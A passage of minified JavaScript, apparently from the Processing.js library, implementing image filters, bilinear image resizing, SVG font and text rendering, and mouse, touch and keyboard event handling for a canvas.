ee=(d7-1)*(d7-1);for(d9=1;d9<d7;d9++){ed[d7+d9]=ed[d8]=ee}ed[d7]=d7*d7}};var b6=function(el,eq){var d9,ec,ei,en,eo,ex,ep;var es,ek,ew,ev,em;var ef=eq.pixels.getLength();var er=new e(ef);var eA=new e(ef);var ee=new e(ef);var ez=new e(ef);var ey=0;var eh,eg,eu,eb;bm(el);var d8=eq.height;var d7=eq.width;var et=cV.shared.blurKernelSize;var ej=cV.shared.blurRadius;var ed=cV.shared.blurKernel;var ea=eq.imageData.data;for(eg=0;eg<d8;eg++){for(eh=0;eh<d7;eh++){en=ei=ec=eo=d9=0;es=eh-ej;if(es<0){em=-es;es=0}else{if(es>=d7){break}em=0}for(eu=em;eu<et;eu++){if(es>=d7){break}eb=(es+ey)*4;ep=ed[eu];eo+=ep*ea[eb+3];ec+=ep*ea[eb];ei+=ep*ea[eb+1];en+=ep*ea[eb+2];d9+=ep;es++}ek=ey+eh;ez[ek]=eo/d9;er[ek]=ec/d9;eA[ek]=ei/d9;ee[ek]=en/d9}ey+=d7}ey=0;ew=-ej;ev=ew*d7;for(eg=0;eg<d8;eg++){for(eh=0;eh<d7;eh++){en=ei=ec=eo=d9=0;if(ew<0){em=ek=-ew;es=eh}else{if(ew>=d8){break}em=0;ek=ew;es=eh+ev}for(eu=em;eu<et;eu++){if(ek>=d8){break}ep=ed[eu];eo+=ep*ez[es];ec+=ep*er[es];ei+=ep*eA[es];en+=ep*ee[es];d9+=ep;ek++;es+=d7}eb=(eh+ey)*4;ea[eb]=ec/d9;ea[eb+1]=ei/d9;ea[eb+2]=en/d9;ea[eb+3]=eo/d9}ey+=d7;ev+=d7;ew++}};var ce=function(eo,ei){var ee=0;var es=ei.pixels.getLength();var ej=new I(es);var em,d8,eh,eg,ea;var en,eb,ed,ef,d9,ek,er,d7,ep,ec,eq,el;if(!eo){while(ee<es){em=ee;d8=ee+ei.width;while(ee<d8){eh=eg=ei.pixels.getPixel(ee);eb=ee-1;en=ee+1;ed=ee-ei.width;ef=ee+ei.width;if(eb<em){eb=ee}if(en>=d8){en=ee}if(ed<0){ed=0}if(ef>=es){ef=ee}er=ei.pixels.getPixel(ed);ek=ei.pixels.getPixel(eb);d7=ei.pixels.getPixel(ef);d9=ei.pixels.getPixel(en);ea=77*(eh>>16&255)+151*(eh>>8&255)+28*(eh&255);ec=77*(ek>>16&255)+151*(ek>>8&255)+28*(ek&255);ep=77*(d9>>16&255)+151*(d9>>8&255)+28*(d9&255);eq=77*(er>>16&255)+151*(er>>8&255)+28*(er&255);el=77*(d7>>16&255)+151*(d7>>8&255)+28*(d7&255);if(ec>ea){eg=ek;ea=ec}if(ep>ea){eg=d9;ea=ep}if(eq>ea){eg=er;ea=eq}if(el>ea){eg=d7;ea=el}ej[ee++]=eg}}}else{while(ee<es){em=ee;d8=ee+ei.width;while(ee<d8){eh=eg=ei.pixels.getPixel(ee);eb=ee-1;en=ee+1;ed=ee-ei.width;ef=ee+ei.width;if(eb<em){eb=ee}if(en>=d8){en=ee}if(ed<0){ed=0}if(ef>=es){ef=ee}er=ei.pixels.getPixel(ed);ek=ei.pixels.getPixel(eb);d7=ei.pixels.getPixel(ef);d9=ei.pixels.getPixel(en);ea=77*(eh>>16&255)+151*(eh>>8&255)+28*(eh&255);ec=77*(ek>>16&255)+151*(ek>>8&255)+28*(ek&255);ep=77*(d9>>16&255)+151*(d9>>8&255)+28*(d9&255);eq=77*(er>>16&255)+151*(er>>8&255)+28*(er&255);el=77*(d7>>16&255)+151*(d7>>8&255)+28*(d7&255);if(ec<ea){eg=ek;ea=ec}if(ep<ea){eg=d9;ea=ep}if(eq<ea){eg=er;ea=eq}if(el<ea){eg=d7;ea=el}ej[ee++]=eg}}}ei.pixels.set(ej)};cV.filter=function(ee,ed,ea){var eh,ec,d8,eg;if(arguments.length===3){ea.loadPixels();eh=ea}else{cV.loadPixels();eh=cV}if(ed===r){ed=null}if(eh.isRemote){throw"Image is loaded remotely. Cannot filter image."}var ei=eh.pixels.getLength();switch(ee){case 11:var ej=ed||1;b6(ej,eh);break;case 12:if(eh.format===4){for(eg=0;eg<ei;eg++){ec=255-eh.pixels.getPixel(eg);eh.pixels.setPixel(eg,4278190080|ec<<16|ec<<8|ec)}eh.format=1}else{for(eg=0;eg<ei;eg++){ec=eh.pixels.getPixel(eg);d8=77*(ec>>16&255)+151*(ec>>8&255)+28*(ec&255)>>8;eh.pixels.setPixel(eg,ec&4278190080|d8<<16|d8<<8|d8)}}break;case 13:for(eg=0;eg<ei;eg++){eh.pixels.setPixel(eg,eh.pixels.getPixel(eg)^16777215)}break;case 15:if(ed===null){throw"Use filter(POSTERIZE, int levels) instead of filter(POSTERIZE)"}var em=cV.floor(ed);if(em<2||em>255){throw"Levels must be between 2 and 255 for filter(POSTERIZE, levels)"}var ef=em-1;for(eg=0;eg<ei;eg++){var d7=eh.pixels.getPixel(eg)>>16&255;var ek=eh.pixels.getPixel(eg)>>8&255;var d9=eh.pixels.getPixel(eg)&255;d7=(d7*em>>8)*255/ef;ek=(ek*em>>8)*255/ef;d9=(d9*em>>8)*255/ef;eh.pixels.setPixel(eg,4278190080&eh.pixels.getPixel(eg)|d7<<16|ek<<8|d9)}break;case 14:for(eg=0;eg<ei;eg++){eh.pixels.setPixel(eg,eh.pixels.getPixel(eg)|4278190080)}eh.format=1;break;case 16:if(ed===null){ed=0.5}if(ed<0||ed>1){throw"Level must be between 0 and 1 for filter(THRESHOLD, level)"}var eb=cV.floor(ed*255);for(eg=0;eg<ei;eg++){var el=cV.max((eh.pixels.getPixel(eg)&16711680)>>16,cV.max((eh.pixels.getPixel(eg)&65280)>>8,eh.pixels.getPixel(eg)&255));eh.pixels.setPixel(eg,eh.pixels.getPixel(eg)&4278190080|(el<eb?0:16777215))}break;case 17:ce(true,eh);break;case 18:ce(false,eh);break}eh.updatePixels()};cV.shared={fracU:0,ifU:0,fracV:0,ifV:0,u1:0,u2:0,v1:0,v2:0,sX:0,sY:0,iw:0,iw1:0,ih1:0,ul:0,ll:0,ur:0,lr:0,cUL:0,cLL:0,cUR:0,cLR:0,srcXOffset:0,srcYOffset:0,r:0,g:0,b:0,a:0,srcBuffer:null,blurRadius:0,blurKernelSize:0,blurKernel:null};cV.intersect=function(d9,eg,d8,ef,ek,ed,ej,ec){var ei=d8-d9+1;var eb=ef-eg+1;var d7=ej-ek+1;var ee=ec-ed+1;if(ek<d9){d7+=ek-d9;if(d7>ei){d7=ei}}else{var eh=ei+d9-ek;if(d7>eh){d7=eh}}if(ed<eg){ee+=ed-eg;if(ee>eb){ee=eb}}else{var ea=eb+eg-ed;if(ee>ea){ee=ea}}return !(d7<=0||ee<=0)};var dO={};dO[1]=cV.modes.blend;dO[2]=cV.modes.add;dO[4]=cV.modes.subtract;dO[8]=cV.modes.lightest;dO[16]=cV.modes.darkest;dO[0]=cV.modes.replace;dO[32]=cV.modes.difference;dO[64]=cV.modes.exclusion;dO[128]=cV.modes.multiply;dO[256]=cV.modes.screen;dO[512]=cV.modes.overlay;dO[1024]=cV.modes.hard_light;dO[2048]=cV.modes.soft_light;dO[4096]=cV.modes.dodge;dO[8192]=cV.modes.burn;cV.blit_resize=function(ek,ew,eq,ev,ep,eB,eg,eo,eu,el,et,ej,em){var ez,ey;if(ew<0){ew=0}if(eq<0){eq=0}if(ev>=ek.width){ev=ek.width-1}if(ep>=ek.height){ep=ek.height-1}var eF=ev-ew;var eK=ep-eq;var d7=et-eu;var eh=ej-el;if(d7<=0||eh<=0||eF<=0||eK<=0||eu>=eg||el>=eo||ew>=ek.width||eq>=ek.height){return}var ee=o.floor(eF/d7*32768);var eb=o.floor(eK/eh*32768);var eD=cV.shared;eD.srcXOffset=o.floor(eu<0?-eu*ee:ew*32768);eD.srcYOffset=o.floor(el<0?-el*eb:eq*32768);if(eu<0){d7+=eu;eu=0}if(el<0){eh+=el;el=0}d7=o.min(d7,eg-eu);eh=o.min(eh,eo-el);var er=el*eg+eu;var eN;eD.srcBuffer=ek.imageData.data;eD.iw=ek.width;eD.iw1=ek.width-1;eD.ih1=ek.height-1;var es=cV.filter_bilinear,eH=cV.filter_new_scanline,ef=dO[em],eE,eJ,eC,eG,d9,ea,d8=4278190080,eI=16711680,ex=65280,ed=255,eM=32767,eA=15,ei=1,en=9,ec=eD.srcBuffer,eL=o.min;for(ey=0;ey<eh;ey++){eD.sX=eD.srcXOffset;eD.fracV=eD.srcYOffset&eM;eD.ifV=eM-eD.fracV;eD.v1=(eD.srcYOffset>>eA)*eD.iw;eD.v2=eL((eD.srcYOffset>>eA)+1,eD.ih1)*eD.iw;for(ez=0;ez<d7;ez++){eJ=(er+ez)*4;eN=eB[eJ+3]<<24&d8|eB[eJ]<<16&eI|eB[eJ+1]<<8&ex|eB[eJ+2]&ed;eD.fracU=eD.sX&eM;eD.ifU=eM-eD.fracU;eD.ul=eD.ifU*eD.ifV>>eA;eD.ll=eD.ifU*eD.fracV>>eA;eD.ur=eD.fracU*eD.ifV>>eA;eD.lr=eD.fracU*eD.fracV>>eA;eD.u1=eD.sX>>eA;eD.u2=eL(eD.u1+1,eD.iw1);eC=(eD.v1+eD.u1)*4;eG=(eD.v1+eD.u2)*4;d9=(eD.v2+eD.u1)*4;ea=(eD.v2+eD.u2)*4;eD.cUL=ec[eC+3]<<24&d8|ec[eC]<<16&eI|ec[eC+1]<<8&ex|ec[eC+2]&ed;eD.cUR=ec[eG+3]<<24&d8|ec[eG]<<16&eI|ec[eG+1]<<8&ex|ec[eG+2]&ed;eD.cLL=ec[d9+3]<<24&d8|ec[d9]<<16&eI|ec[d9+1]<<8&ex|ec[d9+2]&ed;eD.cLR=ec[ea+3]<<24&d8|ec[ea]<<16&eI|ec[ea+1]<<8&ex|ec[ea+2]&ed;eD.r=eD.ul*((eD.cUL&eI)>>16)+eD.ll*((eD.cLL&eI)>>16)+eD.ur*((eD.cUR&eI)>>16)+eD.lr*((eD.cLR&eI)>>16)<<ei&eI;eD.g=eD.ul*(eD.cUL&ex)+eD.ll*(eD.cLL&ex)+eD.ur*(eD.cUR&ex)+eD.lr*(eD.cLR&ex)>>>eA&ex;eD.b=eD.ul*(eD.cUL&ed)+eD.ll*(eD.cLL&ed)+eD.ur*(eD.cUR&ed)+eD.lr*(eD.cLR&ed)>>>eA;eD.a=eD.ul*((eD.cUL&d8)>>>24)+eD.ll*((eD.cLL&d8)>>>24)+eD.ur*((eD.cUR&d8)>>>24)+eD.lr*((eD.cLR&d8)>>>24)<<en&d8;eE=ef(eN,eD.a|eD.r|eD.g|eD.b);eB[eJ]=(eE&eI)>>>16;eB[eJ+1]=(eE&ex)>>>8;eB[eJ+2]=eE&ed;eB[eJ+3]=(eE&d8)>>>24;eD.sX+=ee}er+=eg;eD.srcYOffset+=eb}};cV.loadFont=function(d8,d9){if(d8===r){throw"font name required in loadFont."}if(d8.indexOf(".svg")===-1){if(d9===r){d9=U.size}return F.get(d8,d9)}var d7=cV.loadGlyphs(d8);return{name:d8,css:"12px sans-serif",glyph:true,units_per_em:d7.units_per_em,horiz_adv_x:1/d7.units_per_em*d7.horiz_adv_x,ascent:d7.ascent,descent:d7.descent,width:function(ee){var ec=0;var ea=ee.length;for(var eb=0;eb<ea;eb++){try{ec+=parseFloat(cV.glyphLook(cV.glyphTable[d8],ee[eb]).horiz_adv_x)}catch(ed){D.debug(ed)}}return ec/cV.glyphTable[d8].units_per_em}}};cV.createFont=function(d7,d8){return cV.loadFont(d7,d8)};cV.textFont=function(d7,d9){if(d9!==r){if(!d7.glyph){d7=F.get(d7.name,d9)}dW=d9}U=d7;W=U.name;aZ=U.ascent;dx=U.descent;d3=U.leading;var d8=dU.$ensureContext();d8.font=U.css};cV.textSize=function(d8){if(d8!==dW){U=F.get(W,d8);dW=d8;aZ=U.ascent;dx=U.descent;d3=U.leading;var d7=dU.$ensureContext();d7.font=U.css}};cV.textAscent=function(){return aZ};cV.textDescent=function(){return dx};cV.textLeading=function(d7){d3=d7};cV.textAlign=function(d8,d7){L=d8;c0=d7||0};function br(d7){if(d7 instanceof String){return d7}if(typeof d7==="number"){if(d7===(0|d7)){return d7.toString()}return cV.nf(d7,0,3)}if(d7===null||d7===r){return""}return d7.toString()}bO.prototype.textWidth=function(eb){var d7=br(eb).split(/\r?\n/g),d9=0;var d8,ea=d7.length;d4.font=U.css;for(d8=0;d8<ea;++d8){d9=o.max(d9,U.measureTextWidth(d7[d8]))}return d9|0};by.prototype.textWidth=function(ec){var d7=br(ec).split(/\r?\n/g),ea=0;var d9,eb=d7.length;if(cD===r){cD=d.createElement("canvas")}var d8=cD.getContext("2d");d8.font=U.css;for(d9=0;d9<eb;++d9){ea=o.max(ea,d8.measureText(d7[d9]).width)}return ea|0};cV.glyphLook=function(d7,d8){try{switch(d8){case"1":return d7.one;case"2":return d7.two;case"3":return d7.three;case"4":return d7.four;case"5":return d7.five;case"6":return d7.six;case"7":return d7.seven;case"8":return d7.eight;case"9":return d7.nine;case"0":return d7.zero;case" ":return d7.space;case"$":return d7.dollar;case"!":return d7.exclam;case'"':return d7.quotedbl;case"#":return d7.numbersign;case"%":return d7.percent;case"&":return d7.ampersand;case"'":return d7.quotesingle;case"(":return d7.parenleft;case")":return d7.parenright;case"*":return d7.asterisk;case"+":return d7.plus;case",":return d7.comma;case"-":return d7.hyphen;case".":return d7.period;case"/":return d7.slash;case"_":return d7.underscore;case":":return d7.colon;case";":return d7.semicolon;case"<":return d7.less;case"=":return d7.equal;case">":return d7.greater;case"?":return d7.question;case"@":return d7.at;case"[":return d7.bracketleft;case"\\":return d7.backslash;case"]":return d7.bracketright;case"^":return d7.asciicircum;case"`":return d7.grave;case"{":return d7.braceleft;case"|":return d7.bar;case"}":return d7.braceright;case"~":return d7.asciitilde;default:return d7[d8]}}catch(d9){D.debug(d9)}};bO.prototype.text$line=function(ef,ei,eh,eg,ec){var ee=0,ed=0;if(!U.glyph){if(ef&&"fillText" in d4){if(ap){d4.fillStyle=cV.color.toString(aX);ap=false}if(ec===39||ec===3){ee=U.measureTextWidth(ef);if(ec===39){ed=-ee}else{ed=-ee/2}}d4.fillText(ef,ei+ed,eh)}}else{var d7=cV.glyphTable[W];aC();d4.translate(ei,eh+dW);if(ec===39||ec===3){ee=d7.width(ef);if(ec===39){ed=-ee}else{ed=-ee/2}}var ej=d7.units_per_em,eb=1/ej*dW;d4.scale(eb,eb);for(var d8=0,d9=ef.length;d8<d9;d8++){try{cV.glyphLook(d7,ef[d8]).draw()}catch(ea){D.debug(ea)}}cO()}};by.prototype.text$line=function(ee,ei,eh,ef,ec){if(cD===r){cD=d.createElement("canvas")}var d8=d4;d4=cD.getContext("2d");d4.font=U.css;var ed=U.measureTextWidth(ee);cD.width=ed;cD.height=dW;d4=cD.getContext("2d");d4.font=U.css;d4.textBaseline="top";bO.prototype.text$line(ee,0,0,0,37);var d7=cD.width/cD.height;d4=d8;d4.bindTexture(d4.TEXTURE_2D,bP);d4.texImage2D(d4.TEXTURE_2D,0,d4.RGBA,d4.RGBA,d4.UNSIGNED_BYTE,cD);d4.texParameteri(d4.TEXTURE_2D,d4.TEXTURE_MAG_FILTER,d4.LINEAR);d4.texParameteri(d4.TEXTURE_2D,d4.TEXTURE_MIN_FILTER,d4.LINEAR);d4.texParameteri(d4.TEXTURE_2D,d4.TEXTURE_WRAP_T,d4.CLAMP_TO_EDGE);d4.texParameteri(d4.TEXTURE_2D,d4.TEXTURE_WRAP_S,d4.CLAMP_TO_EDGE);var eb=0;if(ec===39){eb=-ed}else{if(ec===3){eb=-ed/2}}var d9=new aM;var ea=dW*0.5;d9.translate(ei+eb-ea/2,eh-ea,ef);d9.scale(-d7*ea,-ea,ea);d9.translate(-1,-1,-1);d9.transpose();var eg=new aM;eg.scale(1,-1,1);eg.apply(dF.array());eg.transpose();d4.useProgram(dM);db("vertex2d",dM,"Vertex",3,cG);db("aTextureCoord2d",dM,"aTextureCoord",2,aa);dV("uSampler2d",dM,"uSampler",[0]);dV("picktype2d",dM,"picktype",1);a5("model2d",dM,"model",false,d9.array());a5("view2d",dM,"view",false,eg.array());dY("color2d",dM,"color",bl);d4.bindBuffer(d4.ELEMENT_ARRAY_BUFFER,P);d4.drawElements(d4.TRIANGLES,6,d4.UNSIGNED_SHORT,0)};function be(ea,ed,ec,eb){var ef,d9;if(ea.indexOf("\n")<0){ef=[ea];d9=1}else{ef=ea.split(/\r?\n/g);d9=ef.length}var d7=0;if(c0===101){d7=aZ+dx}else{if(c0===3){d7=aZ/2-(d9-1)*d3/2}else{if(c0===102){d7=-(dx+(d9-1)*d3)}}}for(var d8=0;d8<d9;++d8){var ee=ef[d8];dU.text$line(ee,ed,ec+d7,eb,L);d7+=d3}}function a9(en,ei,eh,em,ek,eg){if(en.length===0||em===0||ek===0){return}if(dW>ek){return}var ej=-1;var eb=0;var d7=0;var ed=[];for(var ec=0,ep=en.length;ec<ep;ec++){var ee=en[ec];var es=ee===" ";var el=U.measureTextWidth(ee);if(ee!=="\n"&&d7+el<=em){if(es){ej=ec}d7+=el}else{if(ej+1===eb){if(ec>0){ej=ec}else{return}}if(ee==="\n"){ed.push({text:en.substring(eb,ec),width:d7});eb=ec+1}else{ed.push({text:en.substring(eb,ej+1),width:d7});eb=ej+1}d7=0;ec=eb-1}}if(eb<ep){ed.push({text:en.substring(eb),width:d7})}var er=1,ef=aZ;if(L===3){er=em/2}else{if(L===39){er=em}}var eo=ed.length,d8=o.min(eo,o.floor(ek/d3));if(c0===101){ef=aZ+dx}else{if(c0===3){ef=ek/2-d3*(d8/2-1)}else{if(c0===102){ef=dx+d3}}}var d9,ea,eq;for(d9=0;d9<eo;d9++){eq=d9*d3;if(ef+eq>ek-dx){break}ea=ed[d9];dU.text$line(ea.text,ei+er,eh+ef+eq,eg,L)}}cV.text=function(){if(cH===5){return}if(arguments.length===3){be(br(arguments[0]),arguments[1],arguments[2],0)}else{if(arguments.length===4){be(br(arguments[0]),arguments[1],arguments[2],arguments[3])}else{if(arguments.length===5){a9(br(arguments[0]),arguments[1],arguments[2],arguments[3],arguments[4],0)}else{if(arguments.length===6){a9(br(arguments[0]),arguments[1],arguments[2],arguments[3],arguments[4],arguments[5])}}}}};cV.textMode=function(d7){cH=d7};cV.loadGlyphs=function(ed){var ef,ee,eb,d9,em,el,ek,en,eh,eo,ei,ej="[0-9\\-]+",eg;var ec=function(eu,et){var er=0,eq=[],ep,es=new RegExp(eu,"g");ep=eq[er]=es.exec(et);while(ep){er++;ep=eq[er]=es.exec(et)}return eq};var d8=function(eu){var ev=ec("[A-Za-z][0-9\\- ]+|Z",eu);var et=function(){aC();return dU.$ensureContext()};var er=function(){bk();dc();cO()};eg="return {draw:function(){var curContext=beforePathDraw();curContext.beginPath();";ef=0;ee=0;eb=0;d9=0;em=0;el=0;eu=0;en=0;eh="";eo=ev.length-1;for(var eq=0;eq<eo;eq++){var ep=ev[eq][0],es=ec(ej,ep);switch(ep[0]){case"M":ef=parseFloat(es[0][0]);ee=parseFloat(es[1][0]);eg+="curContext.moveTo("+ef+","+-ee+");";break;case"L":ef=parseFloat(es[0][0]);ee=parseFloat(es[1][0]);eg+="curContext.lineTo("+ef+","+-ee+");";break;case"H":ef=parseFloat(es[0][0]);eg+="curContext.lineTo("+ef+","+-ee+");";break;case"V":ee=parseFloat(es[0][0]);eg+="curContext.lineTo("+ef+","+-ee+");";break;case"T":em=parseFloat(es[0][0]);el=parseFloat(es[1][0]);if(eh==="Q"||eh==="T"){eu=o.sqrt(o.pow(ef-eb,2)+o.pow(d9-ee,2));en=o.PI+o.atan2(eb-ef,d9-ee);eb=ef+o.sin(en)*eu;d9=ee+o.cos(en)*eu}else{eb=ef;d9=ee}eg+="curContext.quadraticCurveTo("+eb+","+-d9+","+em+","+-el+");";ef=em;ee=el;break;case"Q":eb=parseFloat(es[0][0]);d9=parseFloat(es[1][0]);em=parseFloat(es[2][0]);el=parseFloat(es[3][0]);eg+="curContext.quadraticCurveTo("+eb+","+-d9+","+em+","+-el+");";ef=em;ee=el;break;case"Z":eg+="curContext.closePath();";break}eh=ep[0]}eg+="afterPathDraw();";eg+="curContext.translate("+ei+",0);";eg+="}}";return(new Function("beforePathDraw","afterPathDraw",eg))(et,er)};var d7=function(es){var er=es.getElementsByTagName("font");cV.glyphTable[ed].horiz_adv_x=er[0].getAttribute("horiz-adv-x");var eu=es.getElementsByTagName("font-face")[0];cV.glyphTable[ed].units_per_em=parseFloat(eu.getAttribute("units-per-em"));cV.glyphTable[ed].ascent=parseFloat(eu.getAttribute("ascent"));cV.glyphTable[ed].descent=parseFloat(eu.getAttribute("descent"));var ew=es.getElementsByTagName("glyph"),eq=ew.length;for(var ev=0;ev<eq;ev++){var ep=ew[ev].getAttribute("unicode");var et=ew[ev].getAttribute("glyph-name");ei=ew[ev].getAttribute("horiz-adv-x");if(ei===null){ei=cV.glyphTable[ed].horiz_adv_x}ek=ew[ev].getAttribute("d");if(ek!==r){eg=d8(ek);cV.glyphTable[ed][et]={name:et,unicode:ep,horiz_adv_x:ei,draw:eg.draw}}}};var ea=function(){var er;try{er=d.implementation.createDocument("","",null)}catch(et){D.debug(et.message);return}try{er.async=false;er.load(ed);d7(er.getElementsByTagName("svg")[0])}catch(eq){D.debug(eq);try{var ep=new B.XMLHttpRequest;ep.open("GET",ed,false);ep.send(null);d7(ep.responseXML.documentElement)}catch(es){D.debug(eq)}}};cV.glyphTable[ed]={};ea(ed);return cV.glyphTable[ed]};cV.param=function(d9){var d8="data-processing-"+d9;if(ac.hasAttribute(d8)){return ac.getAttribute(d8)}for(var ea=0,d7=ac.childNodes.length;ea<d7;++ea){var eb=ac.childNodes.item(ea);if(eb.nodeType!==1||eb.tagName.toLowerCase()!=="param"){continue}if(eb.getAttribute("name")===d9){return eb.getAttribute("value")}}if(cP.params.hasOwnProperty(d9)){return cP.params[d9]}return null};function cK(d8){if(d8==="3D"){dU=new by}else{if(d8==="2D"){dU=new bO}else{dU=new b9}}for(var d7 in b9.prototype){if(b9.prototype.hasOwnProperty(d7)&&d7.indexOf("$")<0){cV[d7]=dU[d7]}}dU.$init()}function cT(d7){return function(){cK("2D");return dU[d7].apply(this,arguments)}}b9.prototype.translate=cT("translate");b9.prototype.scale=cT("scale");b9.prototype.pushMatrix=cT("pushMatrix");b9.prototype.popMatrix=cT("popMatrix");b9.prototype.resetMatrix=cT("resetMatrix");b9.prototype.applyMatrix=cT("applyMatrix");b9.prototype.rotate=cT("rotate");b9.prototype.rotateZ=cT("rotateZ");b9.prototype.redraw=cT("redraw");b9.prototype.toImageData=cT("toImageData");b9.prototype.ambientLight=cT("ambientLight");b9.prototype.directionalLight=cT("directionalLight");b9.prototype.lightFalloff=cT("lightFalloff");b9.prototype.lightSpecular=cT("lightSpecular");b9.prototype.pointLight=cT("pointLight");b9.prototype.noLights=cT("noLights");b9.prototype.spotLight=cT("spotLight");b9.prototype.beginCamera=cT("beginCamera");b9.prototype.endCamera=cT("endCamera");b9.prototype.frustum=cT("frustum");b9.prototype.box=cT("box");b9.prototype.sphere=cT("sphere");b9.prototype.ambient=cT("ambient");b9.prototype.emissive=cT("emissive");b9.prototype.shininess=cT("shininess");b9.prototype.specular=cT("specular");b9.prototype.fill=cT("fill");b9.prototype.stroke=cT("stroke");b9.prototype.strokeWeight=cT("strokeWeight");b9.prototype.smooth=cT("smooth");b9.prototype.noSmooth=cT("noSmooth");b9.prototype.point=cT("point");b9.prototype.vertex=cT("vertex");b9.prototype.endShape=cT("endShape");b9.prototype.bezierVertex=cT("bezierVertex");b9.prototype.curveVertex=cT("curveVertex");b9.prototype.curve=cT("curve");b9.prototype.line=cT("line");b9.prototype.bezier=cT("bezier");b9.prototype.rect=cT("rect");b9.prototype.ellipse=cT("ellipse");b9.prototype.background=cT("background");b9.prototype.image=cT("image");b9.prototype.textWidth=cT("textWidth");b9.prototype.text$line=cT("text$line");b9.prototype.$ensureContext=cT("$ensureContext");b9.prototype.$newPMatrix=cT("$newPMatrix");b9.prototype.size=function(d7,d9,d8){cK(d8===2?"3D":"2D");cV.size(d7,d9,d8)};b9.prototype.$init=E;bO.prototype.$init=function(){cV.size(cV.width,cV.height);d4.lineCap="round";cV.noSmooth();cV.disableContextMenu()};by.prototype.$init=function(){cV.use3DContext=true};dp.prototype.$ensureContext=function(){return d4};function dv(d8,ea){var d9=d8,d7=0,eb=0;cV.pmouseX=cV.mouseX;cV.pmouseY=cV.mouseY;if(d9.offsetParent){do{d7+=d9.offsetLeft;eb+=d9.offsetTop}while(!!(d9=d9.offsetParent))}d9=d8;do{d7-=d9.scrollLeft||0;eb-=d9.scrollTop||0}while(!!(d9=d9.parentNode));d7+=ab;eb+=dl;d7+=aR;eb+=bV;d7+=B.pageXOffset;eb+=B.pageYOffset;return{X:d7,Y:eb}}function aG(d7,d8){var d9=dv(d7,d8);cV.mouseX=d8.pageX-d9.X;cV.mouseY=d8.pageY-d9.Y}function ct(d8){var ea=dv(d8.changedTouches[0].target,d8.changedTouches[0]),d7;for(d7=0;d7<d8.touches.length;d7++){var ec=d8.touches[d7];ec.offsetX=ec.pageX-ea.X;ec.offsetY=ec.pageY-ea.Y}for(d7=0;d7<d8.targetTouches.length;d7++){var d9=d8.targetTouches[d7];d9.offsetX=d9.pageX-ea.X;d9.offsetY=d9.pageY-ea.Y}for(d7=0;d7<d8.changedTouches.length;d7++){var eb=d8.changedTouches[d7];eb.offsetX=eb.pageX-ea.X;eb.offsetY=eb.pageY-ea.Y}return d8}bM(ac,"touchstart",function(d9){ac.setAttribute("style","-webkit-user-select: none");ac.setAttribute("onclick","void(0)");ac.setAttribute("style","-webkit-tap-highlight-color:rgba(0,0,0,0)");for(var d8=0,d7=at.length;d8<d7;d8++){var ea=at[d8].type;if(ea==="mouseout"||ea==="mousemove"||ea==="mousedown"||ea==="mouseup"||ea==="DOMMouseScroll"||ea==="mousewheel"||ea==="touchstart"){dd(at[d8])}}if(cV.touchStart!==r||cV.touchMove!==r||cV.touchEnd!==r||cV.touchCancel!==r){bM(ac,"touchstart",function(eb){if(cV.touchStart!==r){eb=ct(eb);cV.touchStart(eb)}});bM(ac,"touchmove",function(eb){if(cV.touchMove!==r){eb.preventDefault();eb=ct(eb);cV.touchMove(eb)}});bM(ac,"touchend",function(eb){if(cV.touchEnd!==r){eb=ct(eb);cV.touchEnd(eb)}});bM(ac,"touchcancel",function(eb){if(cV.touchCancel!==r){eb=ct(eb);cV.touchCancel(eb)}})}else{bM(ac,"touchstart",function(eb){aG(ac,eb.touches[0]);cV.__mousePressed=true;cV.mouseDragging=false;cV.mouseButton=37;if(typeof cV.mousePressed==="function"){cV.mousePressed()}});bM(ac,"touchmove",function(eb){eb.preventDefault();aG(ac,eb.touches[0]);if(typeof cV.mouseMoved==="function"&&!cV.__mousePressed){cV.mouseMoved()}if(typeof cV.mouseDragged==="function"&&cV.__mousePressed){cV.mouseDragged();cV.mouseDragging=true}});bM(ac,"touchend",function(eb){cV.__mousePressed=false;if(typeof cV.mouseClicked==="function"&&!cV.mouseDragging){cV.mouseClicked()}if(typeof cV.mouseReleased==="function"){cV.mouseReleased()}})}ac.dispatchEvent(d9)});(function(){var d7=true,d8=function(d9){d9.preventDefault();d9.stopPropagation()};cV.disableContextMenu=function(){if(!d7){return}bM(ac,"contextmenu",d8);d7=false};cV.enableContextMenu=function(){if(d7){return}dd({elem:ac,type:"contextmenu",fn:d8});d7=true}})();bM(ac,"mousemove",function(d7){aG(ac,d7);if(typeof cV.mouseMoved==="function"&&!cV.__mousePressed){cV.mouseMoved()}if(typeof cV.mouseDragged==="function"&&cV.__mousePressed){cV.mouseDragged();cV.mouseDragging=true}});bM(ac,"mouseout",function(d7){if(typeof cV.mouseOut==="function"){cV.mouseOut()}});bM(ac,"mouseover",function(d7){aG(ac,d7);if(typeof cV.mouseOver==="function"){cV.mouseOver()}});bM(ac,"mousedown",function(d7){cV.__mousePressed=true;cV.mouseDragging=false;switch(d7.which){case 1:cV.mouseButton=37;break;case 2:cV.mouseButton=3;break;case 3:cV.mouseButton=39;break}if(typeof cV.mousePressed==="function"){cV.mousePressed()}});bM(ac,"mouseup",function(d7){cV.__mousePressed=false;if(typeof cV.mouseClicked==="function"&&!cV.mouseDragging){cV.mouseClicked()}if(typeof cV.mouseReleased==="function"){cV.mouseReleased()}});var am=function(d7){var d8=0;if(d7.wheelDelta){d8=d7.wheelDelta/120;if(B.opera){d8=-d8}}else{if(d7.detail){d8=-d7.detail/3}}cV.mouseScroll=d8;if(d8&&typeof cV.mouseScrolled==="function"){cV.mouseScrolled()}};bM(d,"DOMMouseScroll",am);bM(d,"mousewheel",am);if(typeof ac==="string"){ac=d.getElementById(ac)}if(!ac.getAttribute("tabindex")){ac.setAttribute("tabindex",0)}function dA(d8){var d7=d8.which||d8.keyCode;switch(d7){case 13:return 10;case 91:case 93:case 224:return 157;case 57392:return 17;case 46:return 127;case 45:return 155}return d7}function cA(d8){var d9=d8.which||d8.keyCode;var d7=d8.shiftKey||d8.ctrlKey||d8.altKey||d8.metaKey;switch(d9){case 13:d9=d7?13:10;break;case 8:d9=d7?127:8;break}return new bN(d9)}function cQ(d7){if(typeof d7.preventDefault==="function"){d7.preventDefault()}else{if(typeof d7.stopPropagation==="function"){d7.stopPropagation()}}return false}function dC(){var d7;for(d7 in af){if(af.hasOwnProperty(d7)){cV.__keyPressed=true;return}}cV.__keyPressed=false}function cw(){cV.__keyPressed=false;af=[];dE=null}function bn(d7,d8){af[d7]=d8;dE=null;cV.key=d8;cV.keyCode=d7;cV.keyPressed();cV.keyCode=0;cV.keyTyped();dC()}function cy(d8){var d7=dA(d8);if(d7===127){bn(d7,new 